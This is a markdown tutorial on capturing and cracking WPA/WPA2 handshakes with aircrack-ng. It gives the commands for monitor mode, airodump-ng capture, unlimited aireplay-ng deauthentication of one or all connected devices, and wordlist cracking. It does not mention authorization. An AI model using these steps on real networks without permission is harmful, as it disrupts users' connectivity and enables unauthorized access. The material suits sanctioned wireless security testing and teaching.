# Capture and Crack WPA Hanshake using aircrack-ng

**Aircrack-ng** is a network software suite consisting of a detector, packet sniffer, [WEP](https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy "Wired Equivalent Privacy") and [WPA](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access "Wi-Fi Protected Access")/[WPA2-PSK](https://en.wikipedia.org/wiki/IEEE_802.11i-2004 "IEEE 802.11i-2004") [cracker and analysis](https://en.wikipedia.org/wiki/Cracking_of_wireless_networks "Cracking of wireless networks") tool for [802.11](https://en.wikipedia.org/wiki/802.11 "802.11") [wireless LANs](https://en.wikipedia.org/wiki/Wireless_LAN "Wireless LAN"). It works with any [wireless network interface controller](https://en.wikipedia.org/wiki/Wireless_network_interface_controller "Wireless network interface controller") whose driver supports [raw monitoring mode](https://en.wikipedia.org/wiki/Monitor_mode "Monitor mode") and can sniff [802.11a](https://en.wikipedia.org/wiki/802.11a "802.11a"), [802.11b](https://en.wikipedia.org/wiki/802.11b "802.11b") and [802.11g](https://en.wikipedia.org/wiki/802.11g "802.11g") traffic.  -[Wikipedia](https://en.wikipedia.org/wiki/Aircrack-ng)

### Change wireless interface to monitor mode

Check interface information:
```sh
$ ip a 
```

Set wireless interface down:
```sh
# ifconfig wlan0 down
```

Kill processes that could cause trouble:
```sh
# airmon-ng check kill
```

Start monitor mode on wlan0:
```sh
# airmon-ng start wlan0
```

### Scan for Available Networks

Use ``airodump-ng`` to scan for available Networks
```sh
# airodump-ng wlan0 // airodump-ng wlan0mon
```

### Capture traffic on wlan0mon 
The captured traffic will be used to crack WIFIs WEP and WPA-PSK keys using ``aircrack-ng``

```sh 
# airodump-ng -w <filename> -c <Channel> --bssid <BSSID> wlan0mon
```
- -w (filename) : name of the *.cap that will be generated. It will be saved in the current directory 
	
- --bssid (Mac Address): Only show networks, matching the given bssid.
	
- --channel (Channel) : Indicate the channel(s) to listen to.
	
- wlan0mon: Specifies the interface to capture on.
	
	
### DeAuthenticate a connected device
	
In order to capture Authentication packets, you have to wait for a device to connect to the WiFi with the correct credentials.
	
We will be using ``aireplay-ng`` to send DeAuth packets.

You can either DeAuthenticate a specific device or DeAuthentic all the devices connected to the WiFi Network.

To DeAuthenticate all devices on the specified network:
```sh
# aireplay-ng --deauth 0 -a <BSSID> wlan0mon
```

To DeAuthentic a specific device from the network:
```sh
# aireplay-ng --deauth 0 -a <BSSID> -c <Mac Address> wlan0mon
```

- --deauth : Set the number of deauthentication packets to send to the station. (If you set it to 0 it will send unlimited packets to the station unless you stop it.)
- -a : Set Access Point MAC Address
- c : Set the device Mac Address
- wlan0mon : Specify the interface

### Crack the WiFis WEP and WPA-PSK.

```sh
# aircrack-ng -a2 -b <BSSID> -w /path/to/wordlist.txt filename.cap
```

- -a (amode) :  Force  the attack mode: 1 or wep for WEP (802.11) and 2 or wpa for WPA/WPA2 PSK (802.11i and 802.11w).
- -b (BSSID) :  Select the target network based on the access point MAC address.
- -w /path/to/wordlist.txt :  Path to a dictionary file for wpa cracking. Separate filenames  with  comma  when  using multiple  dictionaries

### Disable monitor mode on the interface.
```sh
# airmon-ng stop wlan0mon
```

Start NetworkManager
```sh
# systemctl start NetworkManager.service
```



	
	



